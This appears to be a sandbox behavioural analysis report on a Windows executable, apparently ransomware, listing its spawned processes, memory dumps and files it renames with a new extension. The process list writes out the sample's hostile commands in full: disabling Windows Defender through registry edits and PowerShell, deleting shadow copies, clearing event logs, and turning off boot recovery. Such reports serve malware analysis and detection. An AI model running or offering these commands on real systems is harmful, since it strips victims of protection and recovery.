| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/1628-54-0x0000000000000000-mapping.dmp
memory/756-55-0x0000000000000000-mapping.dmp
memory/432-56-0x0000000000000000-mapping.dmp
memory/572-57-0x0000000000000000-mapping.dmp
memory/304-58-0x0000000000000000-mapping.dmp
memory/1372-59-0x0000000000000000-mapping.dmp
memory/824-60-0x0000000000000000-mapping.dmp
memory/788-61-0x0000000000000000-mapping.dmp
memory/1180-62-0x0000000000000000-mapping.dmp
memory/1072-63-0x0000000000000000-mapping.dmp
memory/624-64-0x0000000000000000-mapping.dmp
memory/2016-65-0x0000000000000000-mapping.dmp
memory/2020-66-0x0000000000000000-mapping.dmp
memory/1332-67-0x0000000000000000-mapping.dmp
memory/1512-68-0x0000000000000000-mapping.dmp
memory/1716-69-0x0000000000000000-mapping.dmp
memory/1692-70-0x0000000000000000-mapping.dmp
memory/1624-71-0x0000000000000000-mapping.dmp
memory/1508-72-0x0000000000000000-mapping.dmp
memory/1780-73-0x0000000000000000-mapping.dmp
memory/1636-74-0x0000000000000000-mapping.dmp
memory/1764-75-0x0000000000000000-mapping.dmp
memory/1060-76-0x0000000000000000-mapping.dmp
memory/868-77-0x0000000000000000-mapping.dmp
memory/1712-78-0x0000000000000000-mapping.dmp
memory/240-79-0x0000000000000000-mapping.dmp
memory/1368-80-0x0000000000000000-mapping.dmp
memory/764-81-0x0000000000000000-mapping.dmp
memory/1840-82-0x0000000000000000-mapping.dmp
memory/1568-83-0x0000000000000000-mapping.dmp
memory/2016-84-0x0000000000000000-mapping.dmp
memory/836-85-0x0000000000000000-mapping.dmp
memory/1696-86-0x0000000000000000-mapping.dmp
memory/1000-87-0x0000000000000000-mapping.dmp
memory/1856-88-0x0000000000000000-mapping.dmp
memory/1820-89-0x0000000000000000-mapping.dmp
memory/1732-90-0x0000000000000000-mapping.dmp
memory/676-91-0x0000000000000000-mapping.dmp
memory/924-92-0x0000000000000000-mapping.dmp
memory/1772-93-0x0000000000000000-mapping.dmp
memory/1528-94-0x0000000000000000-mapping.dmp
memory/1376-95-0x0000000000000000-mapping.dmp
memory/1988-96-0x0000000000000000-mapping.dmp
memory/1136-97-0x0000000000000000-mapping.dmp
memory/2024-98-0x0000000000000000-mapping.dmp
memory/1980-99-0x0000000000000000-mapping.dmp
memory/1492-100-0x0000000000000000-mapping.dmp
memory/1300-101-0x0000000000000000-mapping.dmp
memory/544-102-0x0000000000000000-mapping.dmp
memory/1724-103-0x0000000000000000-mapping.dmp
memory/860-104-0x0000000000000000-mapping.dmp
memory/1072-105-0x0000000000000000-mapping.dmp
memory/2004-106-0x0000000000000000-mapping.dmp
memory/1196-107-0x0000000000000000-mapping.dmp
memory/1844-108-0x0000000000000000-mapping.dmp
memory/1560-109-0x0000000000000000-mapping.dmp
memory/1500-110-0x0000000000000000-mapping.dmp
memory/1708-111-0x0000000000000000-mapping.dmp
memory/1592-112-0x0000000000000000-mapping.dmp
memory/1592-113-0x000007FEFBE91000-0x000007FEFBE93000-memory.dmp
memory/1164-114-0x0000000000000000-mapping.dmp
memory/1700-116-0x0000000000000000-mapping.dmp
memory/1048-118-0x0000000000000000-mapping.dmp
memory/892-119-0x0000000000000000-mapping.dmp
memory/2064-120-0x0000000000000000-mapping.dmp
memory/2160-122-0x000007FEF33A0000-0x000007FEF3EFD000-memory.dmp
memory/2160-125-0x0000000002842000-0x0000000002844000-memory.dmp
memory/2160-124-0x0000000002840000-0x0000000002842000-memory.dmp
memory/2160-126-0x0000000002844000-0x0000000002847000-memory.dmp
memory/2160-123-0x000000001B790000-0x000000001BA8F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 216713faf5ad3db231c65bc3fc07f2e7 |
| SHA1 | c325742dc83cddf54949c60fe4f77ebeb63dc906 |
| SHA256 | 72776fc4a59574f414dfeb634bc5fcf58f462dd922bac82e05326749dbfc8f54 |
| SHA512 | 32ea81b4a7387afe8b3f8ae5fcc76fbceb2f8fdc09616b07cc05b9d52312b9fdc8294e9f8681233ec69e7b67c0aa0e2c7cde1d78f0e9777cbdfbfc4b12fe510c |
memory/2248-129-0x000007FEF2AC0000-0x000007FEF361D000-memory.dmp
memory/2160-130-0x000000000284B000-0x000000000286A000-memory.dmp
memory/2248-131-0x0000000002750000-0x0000000002752000-memory.dmp
memory/2248-132-0x0000000002752000-0x0000000002754000-memory.dmp
memory/2248-133-0x0000000002754000-0x0000000002757000-memory.dmp
memory/2248-134-0x000000000275B000-0x000000000277A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 19:37
Reported
2022-01-12 19:42
Platform
win10-en-20211208
Max time kernel
26s
Max time network
145s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_8BfjuIeDRIM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.properties.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_dkVYS9_KMCA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7__oFbDF3XyZw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription2-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_A5EGiS2tC940.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_FzJjBKuopg40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-modules.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_30ceRJMoijw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_JgW_xHBOkGM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-util.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_iqs8D6dvnc80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_xHb1kck9lIw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_SYRggr8JJrM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_qG_qO_C8wLw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_Sb24pbLNH4U0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_DI7xeyS8Jjo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3102-0000-1000-0000000FF1CE.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_0hMpgjzGbEU0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msadcor.dll.mui.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_bwogpD0PmH40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_EIG9MREoKTs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_hKb5Asdd1vo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_yUq1XnwldnQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_qK3VDmEJdnQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial2-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_k4yO1VvabCY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-pl.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_PgLFUC71cQo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_VSzq1QgeWFM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_NGMvc2Dt2AE0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_ADSe7x5yfZw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_TzH7ZQpPfPA0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-output2.jar.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_VC5x9azYc0k0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\AccessRuntime2019R_PrepidBypass-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_yUq8FsHtjck0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-pl.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_Bk7Zhn4Qdgo0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_EeoGfn_NIn80.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\uk-UA\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_N65MyZUaa7I0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_mpxQm5ESzF40.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_6Nks-5SzjMk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7__V0eZ7Vi3iw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Constantia-Franklin Gothic Book.xml.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_moD04FwYSx00.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_KMS_Client_AE-ppd.xrm-ms.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_H9lOLKRWYrc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\si.txt.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_nePf06tLVfQ0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_fYnAp_8ROHk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.ixO42nvIh0JFBciEiovMnule1KPBYn9aGYiS16Dyva7_z-amd7gGp7Y0.8zvpm | C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe | N/A |
